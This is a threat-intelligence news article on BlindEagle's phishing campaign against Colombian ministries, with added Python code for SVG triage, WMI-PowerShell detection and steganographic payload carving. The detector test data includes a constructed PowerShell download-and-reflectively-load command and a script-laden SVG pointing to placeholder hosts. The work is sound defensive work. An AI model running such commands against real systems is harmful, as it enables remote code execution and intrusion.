Blind Eagle Hackers Target Government Agencies Using PowerShell Scripts

Colombian government institutions are facing a sophisticated multi-stage cyberattack campaign orchestrated by the BlindEagle threat group, which leveraged compromised internal email accounts, PowerShell scripts, and steganography to deploy remote access trojans on target systems, according to Zscaler ThreatLabz researchers.

The cybersecurity firm discovered the spear-phishing operation in early September 2025, revealing that BlindEagle targeted agencies under Colombia’s Ministry of Commerce, Industry, and Tourism (MCIT) using an email sent from a compromised account within the same organization.

This internal-to-internal approach enabled the attackers to bypass traditional email security controls, including DMARC, DKIM, and SPF checks, while exploiting institutional trust.

ThreatLabz analysis indicates that the phishing email originated from a legitimate Microsoft 365 server authorized by the organization’s SPF policy, and that all message-trajectory headers appear authentic.

The attack demonstrates BlindEagle’s evolution from deploying single-malware campaigns to orchestrating complex, multi-layer attack chains involving the Caminho downloader and DCRAT remote access trojan.

Attack Methodology

The campaign began with a legal-themed phishing email impersonating Colombia’s judicial system, complete with fabricated case numbers and urgent demands for receipt confirmation.

The message contained an SVG image attachment that, when clicked, decoded a Base64-encoded HTML page mimicking an official Colombian judicial web portal.

The SVG attachment included in BlindEagle’s phishing email. 
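The attachment behaviour described above (an SVG whose embedded script decodes a Base64 string into an HTML page) can be checked for at a mail gateway or in triage without rendering the file. The following is an added example written for this article, not code from Zscaler ThreatLabz or from the sample itself: it parses an SVG, flags script elements and event-handler attributes, and decodes any long Base64 run to see whether it contains HTML. The SVG inputs are constructed for the example; the `.invalid` hostname is a placeholder.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Constructed sample attachment (not the BlindEagle file): a tiny SVG whose <script>
# decodes a Base64 string with atob() and writes the resulting HTML into the document,
# the pattern the article describes.
_FAKE_PORTAL_HTML = (
    b"<html><body><h1>Portal Judicial</h1>"
    b"<script>location='http://portal.example.invalid/loader.js'</script>"
    b"</body></html>"
)
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
    '<script>var p=atob("' + base64.b64encode(_FAKE_PORTAL_HTML).decode() + '");'
    'document.write(p);</script></svg>'
)

# Constructed benign SVG for comparison.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'

# Runs of Base64 alphabet long enough to be a payload rather than an id or colour value.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
_HTML_MARKERS = (b"<html", b"<script", b"<body", b"<iframe", b"<form")


def _local_name(qname):
    """Strip an XML namespace prefix such as {http://www.w3.org/2000/svg}."""
    return qname.rsplit("}", 1)[-1].lower()


def _decodes_to_html(candidate):
    """True if the Base64 candidate decodes cleanly and looks like HTML or script."""
    try:
        decoded = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return False
    lowered = decoded.lower()
    return any(marker in lowered for marker in _HTML_MARKERS)


def triage_svg(svg_text):
    """Return a list of findings for one SVG; an empty list means nothing was flagged."""
    findings = []
    root = ET.fromstring(svg_text)
    for element in root.iter():
        if _local_name(element.tag) == "script":
            findings.append("script element present")
        for attr_name in element.attrib:
            # onload=, onclick= and friends run script without a <script> element.
            if _local_name(attr_name).startswith("on"):
                findings.append(f"event handler attribute {attr_name}")
        # Look for Base64 blobs in text content, tail text and attribute values.
        haystacks = [element.text or "", element.tail or ""] + list(element.attrib.values())
        if any(_decodes_to_html(m.group(0))
               for text in haystacks for m in _B64_RUN.finditer(text)):
            findings.append("base64 blob decodes to HTML/script")
    return findings


if __name__ == "__main__":
    for label, svg in (("sample", SAMPLE_SVG), ("benign", BENIGN_SVG)):
        print(label, triage_svg(svg) or "clean")
```

In practice the same check would run over each SVG attachment extracted from the message; any finding is a reason to detonate the file in a sandbox rather than deliver it, since an SVG that carries script or an embedded HTML page has no legitimate role as an e-mail image.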

Victims who interacted with the fraudulent portal automatically downloaded a JavaScript file that initiated a file-less attack sequence.

The malware executed three JavaScript code snippets using integer array deobfuscation techniques, with each stage reconstructing and launching subsequent payloads.

The third JavaScript stage introduced Unicode-based comments and complex string manipulation to evade detection before executing a PowerShell command via Windows Management Instrumentation.

The PowerShell script downloaded an image file from the Internet Archive containing a Base64-encoded payload hidden between specific markers labeled “BaseStart-” and “-BaseEnd.”

Decoded BlindEagle PowerShell command.

Specifically, the decoded command leverages Windows Management Instrumentation (WMI) to obtain a Win32_Process instance.
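PowerShell launched through a Win32_Process call shows up in endpoint telemetry as powershell.exe whose parent is the WMI provider host, WmiPrvSE.exe. The following detection logic is an added example written for this article, not ThreatLabz's code or rule: it scores process-creation records shaped like Sysmon Event ID 1 fields on that parent-child relationship plus generic PowerShell indicators. The events, the `.invalid` URL and the token list are constructed for the example.

```python
# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {   # resembles the chain in the article: WMI provider host spawning PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": (
            'powershell.exe -w hidden -nop -c "$b=(New-Object Net.WebClient)'
            ".DownloadData('https://image-host.invalid/cat.jpg');"
            '[Reflection.Assembly]::Load([Convert]::FromBase64String($s))"'
        ),
    },
    {   # ordinary interactive use from the desktop shell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Users\\analyst\\Documents",
    },
    {   # WmiPrvSE itself being started by the service host, which is normal
        "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
    },
]

# Lower-cased substrings that are common in download-and-load PowerShell one-liners.
_SUSPICIOUS_TOKENS = (
    "frombase64string", "reflection.assembly", "downloadstring", "downloaddata",
    "-enc", "-w hidden", "-nop", "invoke-expression", "iex ",
)
_POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def _basename(path):
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return the list of reasons this event looks like WMI-launched malicious PowerShell."""
    reasons = []
    if (_basename(event["Image"]) in _POWERSHELL_IMAGES
            and _basename(event["ParentImage"]) == "wmiprvse.exe"):
        reasons.append("powershell spawned by WMI provider host (Win32_Process.Create)")
    command = event.get("CommandLine", "").lower()
    reasons.extend(f"command line contains {tok!r}"
                   for tok in _SUSPICIOUS_TOKENS if tok in command)
    return reasons


def detect(events, min_reasons=2):
    """Return (index, reasons) for every event with at least min_reasons findings."""
    hits = []
    for index, event in enumerate(events):
        reasons = score_event(event)
        if len(reasons) >= min_reasons:
            hits.append((index, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(f"event {index}:")
        for reason in reasons:
            print("  -", reason)
```

The threshold is deliberately above one because management agents also create PowerShell processes through WMI; the parent-child relationship is the anchor, and the command-line content supplies the corroboration that separates an administrator's scheduled script from a download-and-reflectively-load chain.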

Using steganography to conceal malicious code, the script carved out the embedded assembly, decoded it, and dynamically loaded it as a .NET module using reflection techniques.

Malware Infrastructure

ThreatLabz identified the loaded assembly as Caminho, a downloader malware that first emerged in Brazilian cybercriminal marketplaces in May 2025.

Once the image is downloaded, the PowerShell script carves out the Base64-encoded payload embedded between the two markers BaseStart- and -BaseEnd.

Content deobfuscated by the PowerShell command.
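The marker pair described above (here and in the earlier PowerShell paragraph) is a concrete artefact a defender can hunt for in proxy-captured or quarantined image files. The following is an added example written for this article, not ThreatLabz's tooling or anything from the sample: it locates the BaseStart-/-BaseEnd region, checks whether it is valid Base64, and reports whether the decoded bytes begin with the MZ signature that every PE file, including a .NET assembly, carries. Nothing is loaded or executed. The "image" bytes are constructed for the example and are not a real JPEG or a real binary.

```python
import base64
import binascii
import re

# Markers named in the ThreatLabz write-up.
START_MARKER = b"BaseStart-"
END_MARKER = b"-BaseEnd"

# Constructed sample "image": a JPEG-like header and trailer around a marked Base64 blob.
# The blob decodes to a fake buffer that starts with the MZ signature; it is not a real
# executable and the surrounding bytes are not a valid picture.
_FAKE_ASSEMBLY = b"MZ" + b"\x90" * 14 + b"CONSTRUCTED-SAMPLE-NOT-A-REAL-BINARY"
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0" + b"\x00" * 32
    + START_MARKER + base64.b64encode(_FAKE_ASSEMBLY) + END_MARKER
    + b"\xff\xd9"
)
# Constructed image with no markers, for comparison.
CLEAN_IMAGE = b"\xff\xd8\xff\xe0" + b"\x00" * 32 + b"\xff\xd9"


def carve_marked_region(blob):
    """Return the bytes between the first START/END marker pair, or None if absent."""
    start = blob.find(START_MARKER)
    if start < 0:
        return None
    start += len(START_MARKER)
    end = blob.find(END_MARKER, start)
    if end < 0:
        return None
    return blob[start:end]


def triage_image(blob):
    """Classify a downloaded image's marked region without executing anything from it."""
    region = carve_marked_region(blob)
    if region is None:
        return {"markers_present": False}
    result = {"markers_present": True, "region_len": len(region)}
    compact = re.sub(rb"\s+", b"", region)  # tolerate line-wrapped Base64
    try:
        decoded = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        result["valid_base64"] = False
        return result
    result["valid_base64"] = True
    result["decoded_len"] = len(decoded)
    # PE files (and therefore .NET assemblies) start with the two-byte MZ signature.
    result["pe_signature"] = decoded[:2] == b"MZ"
    return result


def triage_file(path):
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        return triage_image(fh.read())


if __name__ == "__main__":
    print("sample:", triage_image(SAMPLE_IMAGE))
    print("clean: ", triage_image(CLEAN_IMAGE))
```

A hit with `markers_present` and `pe_signature` both true is a strong indicator on its own; the same marker strings are also a natural basis for a proxy or sandbox content rule, since an image served to a browser has no reason to contain them.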

Evidence suggests Portuguese-speaking developers created Caminho, as the malware’s primary method contains argument names like “caminho” (path) and “extençao” (extension) in Portuguese.

BlindEagle adopted Caminho early, using it to download DCRAT payloads from Discord content delivery networks.

The final-stage DCRAT malware employed process hollowing techniques, launching the legitimate MSBuild.exe utility and injecting malicious code directly into memory.

This AsyncRAT variant features AES-256 encrypted configurations and certificate-based command-and-control server authentication, functionality absent from DCRAT’s original open-source codebase.

ThreatLabz discovered 24 hosts worldwide exposing certificates matching the DCRAT sample’s issuer, with infrastructure primarily hosted on Swedish IP addresses under ASN 42708 (GleSYS AB), a hosting provider historically favored by BlindEagle.

The group also utilized Dynamic DNS services from ydns.eu, consistent with previously documented operational patterns.

Researchers attributed the campaign to BlindEagle with medium confidence based on infrastructure preferences, Colombian targeting, legal-themed lures, extensive use of .NET malware, legitimate service abuse including Discord for payload hosting, and documented steganography techniques.

The attack highlights BlindEagle’s persistent focus on Colombian government entities and demonstrates the group’s adoption of sophisticated tools from underground marketplaces to enhance operational capabilities.
